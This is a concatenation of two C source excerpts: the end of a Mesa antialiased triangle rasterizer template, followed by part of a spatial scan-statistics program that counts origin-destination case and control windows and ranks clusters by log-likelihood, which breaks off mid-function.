* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* Antialiased Triangle Rasterizer Template
*
* This file is #include'd to generate custom AA triangle rasterizers.
* NOTE: this code hasn't been optimized yet. That'll come after it
* works correctly.
*
* The following macros may be defined to indicate what auxillary information
* must be copmuted across the triangle:
* DO_Z - if defined, compute Z values
* DO_ATTRIBS - if defined, compute texcoords, varying, etc.
*/
/*void triangle( struct gl_context *ctx, GLuint v0, GLuint v1, GLuint v2, GLuint pv )*/
{
const SWcontext *swrast = SWRAST_CONTEXT(ctx);
const GLfloat *p0 = v0->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *p1 = v1->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *p2 = v2->attrib[FRAG_ATTRIB_WPOS];
const SWvertex *vMin, *vMid, *vMax;
GLint iyMin, iyMax;
GLfloat yMin, yMax;
GLboolean ltor;
GLfloat majDx, majDy; /* major (i.e. long) edge dx and dy */
SWspan span;
#ifdef DO_Z
GLfloat zPlane[4];
#endif
GLfloat rPlane[4], gPlane[4], bPlane[4], aPlane[4];
#if defined(DO_ATTRIBS)
GLfloat attrPlane[FRAG_ATTRIB_MAX][4][4];
GLfloat wPlane[4]; /* win[3] */
#endif
GLfloat bf = SWRAST_CONTEXT(ctx)->_BackfaceCullSign;
(void) swrast;
INIT_SPAN(span, GL_POLYGON);
span.arrayMask = SPAN_COVERAGE;
/* determine bottom to top order of vertices */
{
GLfloat y0 = v0->attrib[FRAG_ATTRIB_WPOS][1];
GLfloat y1 = v1->attrib[FRAG_ATTRIB_WPOS][1];
GLfloat y2 = v2->attrib[FRAG_ATTRIB_WPOS][1];
if (y0 <= y1) {
if (y1 <= y2) {
vMin = v0; vMid = v1; vMax = v2; /* y0<=y1<=y2 */
}
else if (y2 <= y0) {
vMin = v2; vMid = v0; vMax = v1; /* y2<=y0<=y1 */
}
else {
vMin = v0; vMid = v2; vMax = v1; bf = -bf; /* y0<=y2<=y1 */
}
}
else {
if (y0 <= y2) {
vMin = v1; vMid = v0; vMax = v2; bf = -bf; /* y1<=y0<=y2 */
}
else if (y2 <= y1) {
vMin = v2; vMid = v1; vMax = v0; bf = -bf; /* y2<=y1<=y0 */
}
else {
vMin = v1; vMid = v2; vMax = v0; /* y1<=y2<=y0 */
}
}
}
majDx = vMax->attrib[FRAG_ATTRIB_WPOS][0] - vMin->attrib[FRAG_ATTRIB_WPOS][0];
majDy = vMax->attrib[FRAG_ATTRIB_WPOS][1] - vMin->attrib[FRAG_ATTRIB_WPOS][1];
/* front/back-face determination and cullling */
{
const GLfloat botDx = vMid->attrib[FRAG_ATTRIB_WPOS][0] - vMin->attrib[FRAG_ATTRIB_WPOS][0];
const GLfloat botDy = vMid->attrib[FRAG_ATTRIB_WPOS][1] - vMin->attrib[FRAG_ATTRIB_WPOS][1];
const GLfloat area = majDx * botDy - botDx * majDy;
/* Do backface culling */
if (area * bf < 0 || area == 0 || IS_INF_OR_NAN(area))
return;
ltor = (GLboolean) (area < 0.0F);
span.facing = area * swrast->_BackfaceSign > 0.0F;
}
/* Plane equation setup:
* We evaluate plane equations at window (x,y) coordinates in order
* to compute color, Z, fog, texcoords, etc. This isn't terribly
* efficient but it's easy and reliable.
*/
#ifdef DO_Z
compute_plane(p0, p1, p2, p0[2], p1[2], p2[2], zPlane);
span.arrayMask |= SPAN_Z;
#endif
if (ctx->Light.ShadeModel == GL_SMOOTH) {
compute_plane(p0, p1, p2, v0->color[RCOMP], v1->color[RCOMP], v2->color[RCOMP], rPlane);
compute_plane(p0, p1, p2, v0->color[GCOMP], v1->color[GCOMP], v2->color[GCOMP], gPlane);
compute_plane(p0, p1, p2, v0->color[BCOMP], v1->color[BCOMP], v2->color[BCOMP], bPlane);
compute_plane(p0, p1, p2, v0->color[ACOMP], v1->color[ACOMP], v2->color[ACOMP], aPlane);
}
else {
constant_plane(v2->color[RCOMP], rPlane);
constant_plane(v2->color[GCOMP], gPlane);
constant_plane(v2->color[BCOMP], bPlane);
constant_plane(v2->color[ACOMP], aPlane);
}
span.arrayMask |= SPAN_RGBA;
#if defined(DO_ATTRIBS)
{
const GLfloat invW0 = v0->attrib[FRAG_ATTRIB_WPOS][3];
const GLfloat invW1 = v1->attrib[FRAG_ATTRIB_WPOS][3];
const GLfloat invW2 = v2->attrib[FRAG_ATTRIB_WPOS][3];
compute_plane(p0, p1, p2, invW0, invW1, invW2, wPlane);
span.attrStepX[FRAG_ATTRIB_WPOS][3] = plane_dx(wPlane);
span.attrStepY[FRAG_ATTRIB_WPOS][3] = plane_dy(wPlane);
ATTRIB_LOOP_BEGIN
GLuint c;
if (swrast->_InterpMode[attr] == GL_FLAT) {
for (c = 0; c < 4; c++) {
constant_plane(v2->attrib[attr][c] * invW2, attrPlane[attr][c]);
}
}
else {
for (c = 0; c < 4; c++) {
const GLfloat a0 = v0->attrib[attr][c] * invW0;
const GLfloat a1 = v1->attrib[attr][c] * invW1;
const GLfloat a2 = v2->attrib[attr][c] * invW2;
compute_plane(p0, p1, p2, a0, a1, a2, attrPlane[attr][c]);
}
}
for (c = 0; c < 4; c++) {
span.attrStepX[attr][c] = plane_dx(attrPlane[attr][c]);
span.attrStepY[attr][c] = plane_dy(attrPlane[attr][c]);
}
ATTRIB_LOOP_END
}
#endif
/* Begin bottom-to-top scan over the triangle.
* The long edge will either be on the left or right side of the
* triangle. We always scan from the long edge toward the shorter
* edges, stopping when we find that coverage = 0. If the long edge
* is on the left we scan left-to-right. Else, we scan right-to-left.
*/
yMin = vMin->attrib[FRAG_ATTRIB_WPOS][1];
yMax = vMax->attrib[FRAG_ATTRIB_WPOS][1];
iyMin = (GLint) yMin;
iyMax = (GLint) yMax + 1;
if (ltor) {
/* scan left to right */
const GLfloat *pMin = vMin->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMid = vMid->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMax = vMax->attrib[FRAG_ATTRIB_WPOS];
const GLfloat dxdy = majDx / majDy;
const GLfloat xAdj = dxdy < 0.0F ? -dxdy : 0.0F;
GLint iy;
#ifdef _OPENMP
#pragma omp parallel for schedule(dynamic) private(iy) firstprivate(span)
#endif
for (iy = iyMin; iy < iyMax; iy++) {
GLfloat x = pMin[0] - (yMin - iy) * dxdy;
GLint ix, startX = (GLint) (x - xAdj);
GLuint count;
GLfloat coverage = 0.0F;
#ifdef _OPENMP
/* each thread needs to use a different (global) SpanArrays variable */
span.array = SWRAST_CONTEXT(ctx)->SpanArrays + omp_get_thread_num();
#endif
/* skip over fragments with zero coverage */
while (startX < SWRAST_MAX_WIDTH) {
coverage = compute_coveragef(pMin, pMid, pMax, startX, iy);
if (coverage > 0.0F)
break;
startX++;
}
/* enter interior of triangle */
ix = startX;
#if defined(DO_ATTRIBS)
/* compute attributes at left-most fragment */
span.attrStart[FRAG_ATTRIB_WPOS][3] = solve_plane(ix + 0.5F, iy + 0.5F, wPlane);
ATTRIB_LOOP_BEGIN
GLuint c;
for (c = 0; c < 4; c++) {
span.attrStart[attr][c] = solve_plane(ix + 0.5F, iy + 0.5F, attrPlane[attr][c]);
}
ATTRIB_LOOP_END
#endif
count = 0;
while (coverage > 0.0F) {
/* (cx,cy) = center of fragment */
const GLfloat cx = ix + 0.5F, cy = iy + 0.5F;
SWspanarrays *array = span.array;
array->coverage[count] = coverage;
#ifdef DO_Z
array->z[count] = (GLuint) solve_plane(cx, cy, zPlane);
#endif
array->rgba[count][RCOMP] = solve_plane_chan(cx, cy, rPlane);
array->rgba[count][GCOMP] = solve_plane_chan(cx, cy, gPlane);
array->rgba[count][BCOMP] = solve_plane_chan(cx, cy, bPlane);
array->rgba[count][ACOMP] = solve_plane_chan(cx, cy, aPlane);
ix++;
count++;
coverage = compute_coveragef(pMin, pMid, pMax, ix, iy);
}
if (ix > startX) {
span.x = startX;
span.y = iy;
span.end = (GLuint) ix - (GLuint) startX;
_swrast_write_rgba_span(ctx, &span);
}
}
}
else {
/* scan right to left */
const GLfloat *pMin = vMin->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMid = vMid->attrib[FRAG_ATTRIB_WPOS];
const GLfloat *pMax = vMax->attrib[FRAG_ATTRIB_WPOS];
const GLfloat dxdy = majDx / majDy;
const GLfloat xAdj = dxdy > 0 ? dxdy : 0.0F;
GLint iy;
#ifdef _OPENMP
#pragma omp parallel for schedule(dynamic) private(iy) firstprivate(span)
#endif
for (iy = iyMin; iy < iyMax; iy++) {
GLfloat x = pMin[0] - (yMin - iy) * dxdy;
GLint ix, left, startX = (GLint) (x + xAdj);
GLuint count, n;
GLfloat coverage = 0.0F;
#ifdef _OPENMP
/* each thread needs to use a different (global) SpanArrays variable */
span.array = SWRAST_CONTEXT(ctx)->SpanArrays + omp_get_thread_num();
#endif
/* make sure we're not past the window edge */
if (startX >= ctx->DrawBuffer->_Xmax) {
startX = ctx->DrawBuffer->_Xmax - 1;
}
/* skip fragments with zero coverage */
while (startX > 0) {
coverage = compute_coveragef(pMin, pMax, pMid, startX, iy);
if (coverage > 0.0F)
break;
startX--;
}
/* enter interior of triangle */
ix = startX;
count = 0;
while (coverage > 0.0F) {
/* (cx,cy) = center of fragment */
const GLfloat cx = ix + 0.5F, cy = iy + 0.5F;
SWspanarrays *array = span.array;
ASSERT(ix >= 0);
array->coverage[ix] = coverage;
#ifdef DO_Z
array->z[ix] = (GLuint) solve_plane(cx, cy, zPlane);
#endif
array->rgba[ix][RCOMP] = solve_plane_chan(cx, cy, rPlane);
array->rgba[ix][GCOMP] = solve_plane_chan(cx, cy, gPlane);
array->rgba[ix][BCOMP] = solve_plane_chan(cx, cy, bPlane);
array->rgba[ix][ACOMP] = solve_plane_chan(cx, cy, aPlane);
ix--;
count++;
coverage = compute_coveragef(pMin, pMax, pMid, ix, iy);
}
#if defined(DO_ATTRIBS)
/* compute attributes at left-most fragment */
span.attrStart[FRAG_ATTRIB_WPOS][3] = solve_plane(ix + 1.5F, iy + 0.5F, wPlane);
ATTRIB_LOOP_BEGIN
GLuint c;
for (c = 0; c < 4; c++) {
span.attrStart[attr][c] = solve_plane(ix + 1.5F, iy + 0.5F, attrPlane[attr][c]);
}
ATTRIB_LOOP_END
#endif
if (startX > ix) {
n = (GLuint) startX - (GLuint) ix;
left = ix + 1;
/* shift all values to the left */
/* XXX this is temporary */
{
SWspanarrays *array = span.array;
GLint j;
for (j = 0; j < (GLint) n; j++) {
array->coverage[j] = array->coverage[j + left];
COPY_CHAN4(array->rgba[j], array->rgba[j + left]);
#ifdef DO_Z
array->z[j] = array->z[j + left];
#endif
}
}
span.x = left;
span.y = iy;
span.end = n;
_swrast_write_rgba_span(ctx, &span);
}
}
}
}
#undef DO_Z
#undef DO_ATTRIBS
#undef DO_OCCLUSION_TEST
|
scan.c | /**
* scan.c
* Authors: Yizhao Gao <yizhaotsccsj@gmail.com>
* Date: {08/03/2017}
*/
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <omp.h>
void getCCCount4DSph(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, int * casInW, int * conInW, int elimIntersectOD) {
double distance;
int minWindow;
for(int i = 0; i < locCount * wCount; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distance, minWindow)
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < locCount; j++) {
distance = sqrt((x1[i] - x1[j]) * (x1[i] - x1[j]) + (y1[i] - y1[j]) * (y1[i] - y1[j]) + (x2[i] - x2[j]) * (x2[i] - x2[j]) + (y2[i] - y2[j]) * (y2[i] - y2[j]));
minWindow = (int)(ceil(distance / wSize));
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((x1[i] - x2[i]) * (x1[i] - x2[i]) + (y1[i] - y2[i]) * (y1[i] - y2[i])) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
return;
}
void getCCCount4DSph(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, double xMin, double yMin, double cellSize, int nCol, int nRow, int * casInW, int * conInW, int elimIntersectOD) {
double distance;
int minWindow;
int totalWindows = nCol * nCol * nRow * nRow * wCount;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
int totalCenters = nRow * nRow * nCol * nCol;
#pragma omp parallel for private(distance, minWindow)
for(int i = 0; i < totalCenters; i++) {
int temp;
int cX2 = i % nCol;
temp = i / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double centerX1 = xMin + cellSize * cX1;
double centerY1 = yMin + cellSize * cY1;
double centerX2 = xMin + cellSize * cX2;
double centerY2 = yMin + cellSize * cY2;
for(int j = 0; j < locCount; j++) {
distance = sqrt((centerX1 - x1[j]) * (centerX1 - x1[j]) + (centerY1 - y1[j]) * (centerY1 - y1[j]) + (centerX2 - x2[j]) * (centerX2 - x2[j]) + (centerY2 - y2[j]) * (centerY2 - y2[j]));
minWindow = (int)(ceil(distance / wSize));
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((centerX1 - centerX2) * (centerX1 - centerX2) + (centerY1 - centerY2) * (centerY1 - centerY2)) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
}
void getCCCount2DSame(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindow;
for(int i = 0; i < locCount * wCount; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distanceO, distanceD, minWindow)
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((x1[i] - x1[j]) * (x1[i] - x1[j]) + (y1[i] - y1[j]) * (y1[i] - y1[j]));
distanceD = sqrt((x2[i] - x2[j]) * (x2[i] - x2[j]) + (y2[i] - y2[j]) * (y2[i] - y2[j]));
if(distanceO > distanceD) {
minWindow = (int)(ceil(distanceO / wSize));
}
else {
minWindow = (int)(ceil(distanceD / wSize));
}
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((x1[i] - x2[i]) * (x1[i] - x2[i]) + (y1[i] - y2[i]) * (y1[i] - y2[i])) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
return;
}
void getCCCount2DSame(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, double xMin, double yMin, double cellSize, int nCol, int nRow, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindow;
int totalWindows = nCol * nCol * nRow * nRow * wCount;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
int totalCenters = nRow * nRow * nCol * nCol;
#pragma omp parallel for private(distanceO, distanceD, minWindow)
for(int i = 0; i < totalCenters; i++) {
int temp;
int cX2 = i % nCol;
temp = i / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double centerX1 = xMin + cellSize * cX1;
double centerY1 = yMin + cellSize * cY1;
double centerX2 = xMin + cellSize * cX2;
double centerY2 = yMin + cellSize * cY2;
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((centerX1 - x1[j]) * (centerX1 - x1[j]) + (centerY1 - y1[j]) * (centerY1 - y1[j]));
distanceD = sqrt((centerX2 - x2[j]) * (centerX2 - x2[j]) + (centerY2 - y2[j]) * (centerY2 - y2[j]));
if(distanceO > distanceD) {
minWindow = (int)(ceil(distanceO / wSize));
}
else {
minWindow = (int)(ceil(distanceD / wSize));
}
if(minWindow > 0)
minWindow --;
for(int k = minWindow; k < wCount; k++) {
casInW[i * wCount + k] += nCass[j];
conInW[i * wCount + k] += nCons[j];
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((centerX1 - centerX2) * (centerX1 - centerX2) + (centerY1 - centerY2) * (centerY1 - centerY2)) / 2;
int maxWindow = ODDistance / wSize;
for(int k = maxWindow; k < wCount; k++) {
casInW[i * wCount + k] = -1;
}
}
}
}
void getCCCount2DDiff(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindowO, minWindowD;
int windowPerCen = wCount * wCount;
int totalWindows = windowPerCen * locCount;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distanceO, distanceD, minWindowO, minWindowD)
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((x1[i] - x1[j]) * (x1[i] - x1[j]) + (y1[i] - y1[j]) * (y1[i] - y1[j]));
distanceD = sqrt((x2[i] - x2[j]) * (x2[i] - x2[j]) + (y2[i] - y2[j]) * (y2[i] - y2[j]));
minWindowO = (int)(ceil(distanceO / wSize));
minWindowD = (int)(ceil(distanceD / wSize));
if(minWindowO > 0)
minWindowO --;
if(minWindowD > 0)
minWindowD --;
for(int k = minWindowO; k < wCount; k++) {
for(int l = minWindowD; l < wCount; l++) {
casInW[i * windowPerCen + k * wCount + l] += nCass[j];
conInW[i * windowPerCen + k * wCount + l] += nCons[j];
}
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((x1[i] - x2[i]) * (x1[i] - x2[i]) + (y1[i] - y2[i]) * (y1[i] - y2[i]));
int sumWindow = (int)(ceil(ODDistance / wSize)) - 2;
for(int k = 0; k < wCount; k++) {
for(int l = 0; l < wCount; l++) {
if(k + l > sumWindow) {
casInW[i * windowPerCen + k * wCount + l] = -1;
}
}
}
}
}
return;
}
void getCCCount2DDiff(double * x1, double * y1, double * x2, double * y2, int * nCass, int * nCons, int locCount, double wSize, int wCount, double xMin, double yMin, double cellSize, int nCol, int nRow, int * casInW, int * conInW, int elimIntersectOD) {
double distanceO, distanceD;
int minWindowO, minWindowD;
int windowPerCen = wCount * wCount;
int totalCenters = nRow * nRow * nCol * nCol;
int totalWindows = totalCenters * windowPerCen;
for(int i = 0; i < totalWindows; i++) {
casInW[i] = 0;
conInW[i] = 0;
}
#pragma omp parallel for private(distanceO, distanceD, minWindowO, minWindowD)
for(int i = 0; i < totalCenters; i++) {
int temp;
int cX2 = i % nCol;
temp = i / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double centerX1 = xMin + cellSize * cX1;
double centerY1 = yMin + cellSize * cY1;
double centerX2 = xMin + cellSize * cX2;
double centerY2 = yMin + cellSize * cY2;
for(int j = 0; j < locCount; j++) {
distanceO = sqrt((centerX1 - x1[j]) * (centerX1 - x1[j]) + (centerY1 - y1[j]) * (centerY1 - y1[j]));
distanceD = sqrt((centerX2 - x2[j]) * (centerX2 - x2[j]) + (centerY2 - y2[j]) * (centerY2 - y2[j]));
minWindowO = (int)(ceil(distanceO / wSize));
minWindowD = (int)(ceil(distanceD / wSize));
if(minWindowO > 0)
minWindowO --;
if(minWindowD > 0)
minWindowD --;
for(int k = minWindowO; k < wCount; k++) {
for(int l = minWindowD; l < wCount; l++) {
casInW[i * windowPerCen + k * wCount + l] += nCass[j];
conInW[i * windowPerCen + k * wCount + l] += nCons[j];
}
}
}
if(elimIntersectOD > 0) {
double ODDistance = sqrt((centerX1 - centerX2) * (centerX1 - centerX2) + (centerY1 - centerY2) * (centerY1 - centerY2));
int sumWindow = (int)(ceil(ODDistance / wSize)) - 2;
for(int k = 0; k < wCount; k++) {
for(int l = 0; l < wCount; l++) {
if(k + l > sumWindow) {
casInW[i * windowPerCen + k * wCount + l] = -1;
}
}
}
}
}
}
void loglikelihood(double * ll, int * casInW, int * conInW, int totalWindow, int casCount, int conCount, int highLow) {
double cas, con, tot;
double llTemp;
int totCount = casCount + conCount;
bool highCluster = true;
bool lowCluster = true;
if(highLow == 1)
lowCluster = false;
else if(highLow == -1)
highCluster = false;
#pragma omp parallel for private(cas, con, tot, llTemp)
for(int i = 0; i < totalWindow; i++) {
cas = casInW[i];
con = conInW[i];
tot = cas + con;
if(cas == -1) {
ll[i] = 1;
}
else if(cas * conCount > con * casCount) { //High cluster of cases
if(highCluster) {
llTemp = cas * log(cas/tot);
if(con > 0)
llTemp += con * log(con/tot);
if(casCount > cas)
llTemp += (casCount - cas) * log((casCount - cas)/(totCount - tot));
if(conCount > con)
llTemp += (conCount - con) * log((conCount - con)/(totCount - tot));
ll[i] = llTemp;
}
else
ll[i] = 1;
}
else { //Low cluster of cases
if(lowCluster) {
llTemp = con * log(con/tot);
if(cas > 0)
llTemp += cas * log(cas/tot);
if(casCount > cas)
llTemp += (casCount - cas) * log((casCount - cas)/(totCount - tot));
if(conCount > con)
llTemp += (conCount - con) * log((conCount - con)/(totCount - tot));
ll[i] = llTemp;
}
else
ll[i] = 1;
}
}
}
void findTopNCluster4DSph(double * x1, double * y1, double * x2, double * y2, int locCount, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
double lastX1, lastY1, lastX2, lastY2, lastRad;
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
double distance;
int maxWindow;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < locCount; i++) {
distance = sqrt((x1[i] - lastX1) * (x1[i] - lastX1) + (y1[i] - lastY1) * (y1[i] - lastY1) + (x2[i] - lastX2) * (x2[i] - lastX2) + (y2[i] - lastY2) * (y2[i] - lastY2)) - lastRad;
maxWindow = ceil(distance / wSize) - 1;
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secoundary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster4DSph(double xMin, double yMin, double cellSize, int nRow, int nCol, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int totalCenters = nRow * nRow * nCol * nCol;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
int temp;
int cX2 = aCenter % nCol;
temp = aCenter / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
int cY1 = temp / nCol;
double lastX1 = xMin + cellSize * cX1;
double lastY1 = yMin + cellSize * cY1;
double lastX2 = xMin + cellSize * cX2;
double lastY2 = yMin + cellSize * cY2;
double lastRad = (aRadius + 1) * wSize;
double distance;
int maxWindow;
double thisX1, thisY1, thisX2, thisY2;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < totalCenters; i++) {
cX2 = i % nCol;
temp = i / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
thisX1 = xMin + cellSize * cX1;
thisY1 = yMin + cellSize * cY1;
thisX2 = xMin + cellSize * cX2;
thisY2 = yMin + cellSize * cY2;
distance = sqrt((thisX1 - lastX1) * (thisX1 - lastX1) + (thisY1 - lastY1) * (thisY1 - lastY1) + (thisX2 - lastX2) * (thisX2 - lastX2) + (thisY2 - lastY2) * (thisY2 - lastY2)) - lastRad;
maxWindow = ceil(distance / wSize) - 1;
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secoundary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
cX2 = aCenter % nCol;
temp = aCenter / nCol;
cY2 = temp % nRow;
temp = temp / nRow;
cX1 = temp % nCol;
cY1 = temp / nCol;
lastX1 = xMin + cellSize * cX1;
lastY1 = yMin + cellSize * cY1;
lastX2 = xMin + cellSize * cX2;
lastY2 = yMin + cellSize * cY2;
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster2DSame(double * x1, double * y1, double * x2, double * y2, int locCount, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
double lastX1, lastY1, lastX2, lastY2, lastRad;
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
double distanceO, distanceD;
int maxWindow;
for(int c = 1; c < nClusters; c ++) {
//Remove intersecting clusters
for(int i = 0; i < locCount; i++) {
distanceO = sqrt((x1[i] - lastX1) * (x1[i] - lastX1) + (y1[i] - lastY1) * (y1[i] - lastY1)) - lastRad;
distanceD = sqrt((x2[i] - lastX2) * (x2[i] - lastX2) + (y2[i] - lastY2) * (y2[i] - lastY2)) - lastRad;
if(distanceO > distanceD) {
maxWindow = ceil(distanceO / wSize) - 1;
}
else {
maxWindow = ceil(distanceD / wSize) - 1;
}
if(maxWindow < 0)
maxWindow = 0;
for(int j = maxWindow; j < wCount; j++) {
ll[i * wCount + j] = 1;
}
}
//Find secoundary clusters
aCenter = -1;
aRadius = -1;
for(int i = 0; i < locCount; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[c] = aCenter;
radius[c] = aRadius;
if(aCenter != -1) {
cLL[c] = ll[aCenter * wCount + aRadius];
}
else {
break;
}
lastX1 = x1[aCenter];
lastY1 = y1[aCenter];
lastX2 = x2[aCenter];
lastY2 = y2[aCenter];
lastRad = (aRadius + 1) * wSize;
}
return;
}
void findTopNCluster2DSame(double xMin, double yMin, double cellSize, int nRow, int nCol, double * ll, double wSize, int wCount, int * center, int * radius, double * cLL, int nClusters) {
if(nClusters < 1)
return;
int totalCenters = nRow * nRow * nCol * nCol;
int aCenter = -1;
int aRadius = -1;
for(int i = 0; i < totalCenters; i++) {
for(int j = 0; j < wCount; j++) {
if(ll[i * wCount + j] < 0) {
if(aCenter < 0) {
aCenter = i;
aRadius = j;
}
else if(ll[i * wCount + j] > ll[aCenter * wCount + aRadius]) {
aCenter = i;
aRadius = j;
}
}
}
}
center[0] = aCenter;
radius[0] = aRadius;
cLL[0] = ll[aCenter * wCount + aRadius];
int temp;
int cX2 = aCenter % nCol;
temp = aCenter / nCol;
int cY2 = temp % nRow;
temp = temp / nRow;
int cX1 = temp % nCol;
